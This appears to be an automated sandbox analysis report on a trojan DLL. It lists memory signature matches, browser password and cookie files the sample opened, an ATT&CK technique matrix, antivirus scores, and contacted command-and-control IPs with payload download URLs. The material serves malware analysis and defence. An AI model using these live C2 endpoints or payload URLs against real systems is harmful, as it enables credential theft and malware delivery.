Source: Yara match	File source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003

Remote Access Functionality

Source: Yara match	File source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2880, type: MEMORYSTR
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Obfuscated Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 File Deletion	3 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	813 Process Injection	4 Rootkit	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Masquerading	NTDS	26 System Information Discovery	Distributed Component Object Model	3 Credential API Hooking	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Valid Accounts	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	11 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	813 Process Injection	Proc Filesystem	3 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	21 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	4 System Network Configuration Discovery	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
d6YCUW421p.dll	37%	Virustotal		Browse
d6YCUW421p.dll	33%	ReversingLabs	Win32.Trojan.Lazy
d6YCUW421p.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.4ab0000.0.unpack	100%	Avira	HEUR/AGEN.1245293		Download File

Domains

Source	Detection	Scanner	Link
1.0.0.127.in-addr.arpa	0%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse
8.8.8.8.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://193.56.146.148/stilak64.rar	0%	Virustotal		Browse
http://193.56.146.148/stilak64.rar	0%	Avira URL Cloud	safe
http://193.56.146.148/cook64.rar	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://curlmyip.net	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://ns.micro/1%L	0%	Avira URL Cloud	safe
http://67.43.234.14/images/vdoa2puIgygDcKHOof7W5Nx/Sm5x_2FLro/zObUXzRQyLPWX4K31/W76pZEGagBpT/o6IGunTWfCn/lXzKVuv3SgxDcg/QnnnzAZBFXh1ukr9Caozw/wPM7sTqNdf9sx_2F/Rne6TvIOz1EJrXu/g31KyfFRkwWQ7yEqN4/zXMBf0AoC/FcsOEsPhqIXCKsCLKvy2/p_2BCCsPTnYHLO5apYZ/ZOWl4UxrQhGJIiW3n82a5o/LRy86Sxl6Pzdu/NQ1r9_2F/M2tmRTakUsCXcEs_2FmAAzP/G6Sk1Uhj8yi4/tFtBd.bmp	0%	Avira URL Cloud	safe
http://67.43.234.14/images/fWI73R1_2Fi/dMEh0cq63rRCJy/hEJHCisV7TLXf6s5qDp3z/BCtN_2Bg1My_2Bxo/AhaNT6s6q6_2B58/OQZoTj4FY38JIpdz1z/MCQ_2Fvl2/KaObwwaShYciWGHB8igT/ebmAGB0PycjKyjC2pvQ/6aj0R0O7yrH6fMGLiN7rcC/6qFHr8cars3Gw/I8BuhPaS/BZ6BhWd8QiKaDrJK4XQp4Ag/g0wwOGo1XO/QfQATDgE2jY4Wf7L8/foVbicjFFFm0/9oroSq36Cxf/G6HPMi1wZ9ycu5/gwcS_2Bt/rdAx9WRg/N.bmp	0%	Avira URL Cloud	safe
http://ns.adobp/	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://curlmyip.netQ8tR9QJN7lLzOLlefile://c:	0%	Avira URL Cloud	safe
http://ns.adobe.cmge	0%	Avira URL Cloud	safe
http://146.70.35.138/phpadmin/O5VHv_2BomBJ/FDSQ3C_2FEh/d3AB91pB2zVZZc/V8xBUftmx0M_2Bqnngedi/DpLLDhwUKQDOSSQS/nVaNzwxkqgcnJXK/SQy2RrteBXCJGPusj_/2Fou9gPbn/TEfuPZW_2FR5wp1JKvFc/BRr_2Bgc4Sh6fwKpLbg/92QNhdYG6IBsInIDDSBHis/CLBmXrf7shSlX/Qy4n9fNl/nE2maUEbSwiaPEHMkNYQxQk/D1KSQzl_2F/HXQWBGmfgthfPqv/9SK.src	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
http://193.56.146.148/cook32.rar	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://crl.microsoft.coQ	0%	Avira URL Cloud	safe
http://ns.adobe.uxEN	0%	Avira URL Cloud	safe
http://67.43.234.14/images/exH_2BV5hI6UV32xq/9iKc6ZjImWoQ/GIugApItTP6/eU0FsndbiatJlG/8sZ81QZwXTfmteOvaRx3j/YoZ9Z9WZVb88loFE/XwzEGCF_2FYd014/RsM17SCy13qQU2pAif/TMyGZBQvh/N26WrESLVWVbmtD7LEn9/Rx20gFSw1JZAg58DLOG/BJUKRsQbaNOa0owKYxus_2/BoGrwh_2BDKqm/DuvxAvK6/zywXiP_2Bz0bAUH1Ay0X5pY/Ej1B6Nr9jL/cJXSt0eQu6DGGZWaR/qgLa8p54JO9D/mFJ_2BIO/ix2MS.bmp	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://146.70.35.138/phpadmin/TYhCb5d3/Qd3Po_2BKjelP_2F7WSwUso/7m8jnTpLRx/uExGwdKAdHoPBjWMC/elgD5kzT2sqT/T1iJBxA5UdT/uL5VED_2B8E0P8/_2FtpnrB_2FZlg9AlWg_2/BdtlwpvI_2BcVtwg/McOCY72thR3WVt5/wVoK31AOn6hDpHdQON/XBB32U4r8/fKY68F7l0jZNTMcXJ71L/odruZsWwSuNEIUWqi7s/08LTc4yWUohU0pkFp1T8P2/l2fvxomE6/r6zvT.src	0%	Avira URL Cloud	safe
http://193.56.146.148/stilak32.rar	0%	Avira URL Cloud	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
http://146.70.35.138/phpadmin/zilwS36OC_2/FnjmOckuG_2BCm/VAdwDdj_2Fnac_2F0y6xc/deXhx0rBocPzi7tR/z8VoemZhKDJOEZ_/2FB71dJS5j3dZE2NGK/cGLO3t6yJ/yUrrIk8eZ08FZSU_2FS0/2G1FFOzId8doUQdjVtt/kPQnX57urwlFySqx1IZrAD/AgrnwQGGtXT4R/Tizv3fN7/xX9kvTCwfaZ1KZbAGWbajAo/gFAssOtH9Z/e8lp2TS1JzI4llaNY/olcdYO51/byt.src	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myip.opendns.com	102.129.143.53	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
1.0.0.127.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown
8.8.8.8.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.56.146.148/stilak64.rar	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.56.146.148/cook64.rar	true	Avira URL Cloud: safe	unknown
http://67.43.234.14/images/vdoa2puIgygDcKHOof7W5Nx/Sm5x_2FLro/zObUXzRQyLPWX4K31/W76pZEGagBpT/o6IGunTWfCn/lXzKVuv3SgxDcg/QnnnzAZBFXh1ukr9Caozw/wPM7sTqNdf9sx_2F/Rne6TvIOz1EJrXu/g31KyfFRkwWQ7yEqN4/zXMBf0AoC/FcsOEsPhqIXCKsCLKvy2/p_2BCCsPTnYHLO5apYZ/ZOWl4UxrQhGJIiW3n82a5o/LRy86Sxl6Pzdu/NQ1r9_2F/M2tmRTakUsCXcEs_2FmAAzP/G6Sk1Uhj8yi4/tFtBd.bmp	true	Avira URL Cloud: safe	unknown
http://67.43.234.14/images/fWI73R1_2Fi/dMEh0cq63rRCJy/hEJHCisV7TLXf6s5qDp3z/BCtN_2Bg1My_2Bxo/AhaNT6s6q6_2B58/OQZoTj4FY38JIpdz1z/MCQ_2Fvl2/KaObwwaShYciWGHB8igT/ebmAGB0PycjKyjC2pvQ/6aj0R0O7yrH6fMGLiN7rcC/6qFHr8cars3Gw/I8BuhPaS/BZ6BhWd8QiKaDrJK4XQp4Ag/g0wwOGo1XO/QfQATDgE2jY4Wf7L8/foVbicjFFFm0/9oroSq36Cxf/G6HPMi1wZ9ycu5/gwcS_2Bt/rdAx9WRg/N.bmp	true	Avira URL Cloud: safe	unknown
http://146.70.35.138/phpadmin/O5VHv_2BomBJ/FDSQ3C_2FEh/d3AB91pB2zVZZc/V8xBUftmx0M_2Bqnngedi/DpLLDhwUKQDOSSQS/nVaNzwxkqgcnJXK/SQy2RrteBXCJGPusj_/2Fou9gPbn/TEfuPZW_2FR5wp1JKvFc/BRr_2Bgc4Sh6fwKpLbg/92QNhdYG6IBsInIDDSBHis/CLBmXrf7shSlX/Qy4n9fNl/nE2maUEbSwiaPEHMkNYQxQk/D1KSQzl_2F/HXQWBGmfgthfPqv/9SK.src	true	Avira URL Cloud: safe	unknown
http://193.56.146.148/cook32.rar	true	Avira URL Cloud: safe	unknown
http://67.43.234.14/images/exH_2BV5hI6UV32xq/9iKc6ZjImWoQ/GIugApItTP6/eU0FsndbiatJlG/8sZ81QZwXTfmteOvaRx3j/YoZ9Z9WZVb88loFE/XwzEGCF_2FYd014/RsM17SCy13qQU2pAif/TMyGZBQvh/N26WrESLVWVbmtD7LEn9/Rx20gFSw1JZAg58DLOG/BJUKRsQbaNOa0owKYxus_2/BoGrwh_2BDKqm/DuvxAvK6/zywXiP_2Bz0bAUH1Ay0X5pY/Ej1B6Nr9jL/cJXSt0eQu6DGGZWaR/qgLa8p54JO9D/mFJ_2BIO/ix2MS.bmp	true	Avira URL Cloud: safe	unknown
http://146.70.35.138/phpadmin/TYhCb5d3/Qd3Po_2BKjelP_2F7WSwUso/7m8jnTpLRx/uExGwdKAdHoPBjWMC/elgD5kzT2sqT/T1iJBxA5UdT/uL5VED_2B8E0P8/_2FtpnrB_2FZlg9AlWg_2/BdtlwpvI_2BcVtwg/McOCY72thR3WVt5/wVoK31AOn6hDpHdQON/XBB32U4r8/fKY68F7l0jZNTMcXJ71L/odruZsWwSuNEIUWqi7s/08LTc4yWUohU0pkFp1T8P2/l2fvxomE6/r6zvT.src	true	Avira URL Cloud: safe	unknown
http://193.56.146.148/stilak32.rar	true	Avira URL Cloud: safe	unknown
http://146.70.35.138/phpadmin/zilwS36OC_2/FnjmOckuG_2BCm/VAdwDdj_2Fnac_2F0y6xc/deXhx0rBocPzi7tR/z8VoemZhKDJOEZ_/2FB71dJS5j3dZE2NGK/cGLO3t6yJ/yUrrIk8eZ08FZSU_2FS0/2G1FFOzId8doUQdjVtt/kPQnX57urwlFySqx1IZrAD/AgrnwQGGtXT4R/Tizv3fN7/xX9kvTCwfaZ1KZbAGWbajAo/gFAssOtH9Z/e8lp2TS1JzI4llaNY/olcdYO51/byt.src	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://curlmyip.net	RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609045780.0000028A77C7D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.micro/1%L	RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.adobp/	RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://constitution.org/usdeclar.txtC:	rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
